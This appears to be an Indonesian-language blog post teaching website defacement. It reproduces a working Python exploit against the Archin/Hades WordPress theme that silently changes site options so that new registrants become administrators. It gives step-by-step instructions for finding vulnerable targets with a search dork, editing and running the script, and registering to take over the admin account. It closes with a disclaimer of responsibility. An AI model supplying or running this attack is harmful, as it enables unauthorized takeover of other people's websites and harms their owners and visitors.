Install Python Terlebih Dahulu , sudah ?
ok , silahkan buka notepad . dengan klik "run" ketik "notepad" atau seterah anda , itu hanya saran saya agar lebih simple , lalu paste script berikut ini :
- # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wp-content/themes/archin/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "email_anda@gmail.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
kemudian save file script diatas dengan berekstensi .py [python]
saya sarankan save filenya di "Local Disk (C:)" agar lebih mudah
jangan lupa ganti email anda "email_anda@gmail.com" < ganti ini dengan email anda
lalu cari target yang mau di tusbol dengan mengunakan dork berikut :
- /wp-content/themes/vithy/hades_framework/
sudah ? ok misal , saya sudah mendapatkan targetnya [sebagai contoh]
CTRL+U web target anda , lalu akan muncul tab seperti ini :
misal url sebelumnya adalah http://site.com/events/
setelah itu ganti url target dengan
jika website itu blank / tidak ada text apapun berarti itu vuln.
contohnya seperti ini
kita edit dulu script tadi , ganti ini "10.10.10.5" dengan target anda misal "target.com"
karena saya tadi dapet themes "vithy" jadi saya edit ini (url = "/wp-content/themes/archin/hades_framework/option_panel/ajax.php") menjadi (url = "/wp-content/themes/vithy/hades_framework/option_panel/ajax.php") jika webnya ada "path/wordpress/dll" didepannya tinggal edit ajah jadi (url = "/path/wp-content/themes/archin/hades_framework/option_panel/ajax.php")
kemudian save filenya lagi , jangan di "save as" :p
setelah itu kita buka START > RUN > ketik "cmd" (nanti akan muncul command prompt)
seperti ini
ketik "cd\" atau "cd C:\ (karena script yg diatas diletakkan di local disk)
ketik lagi "filenya.py" contoh nama file saya [lol.py] dan pencet enter. sehingga menjadi seperti ini :
jika muncul gambar seperti itu, berarti tandanya itu berhasil. dan sekarang yang kita butuhkan adalah registrasi ke target website dengan menuju ke http://target.com/wp-login.php?action=register
Isi Usernamenya dengan "administrator"
lalu isi Emailnya dengan email anda
jika sudah maka silahkan cek Email anda , disana anda akan mendapatkan Password anda dari Username "administrator"
Seterusnya seterah anda ^_^
NB: Saya tidak bertanggung jawab atas apapun yang terjadi pada diri anda , karena disini saya hanya berbagi :)
Knowledge is Free ^_^
Sumber :http://dark-cannon.blogspot.com/2013/08/deface-dengan-archin-themes.html
0 comments:
Post a Comment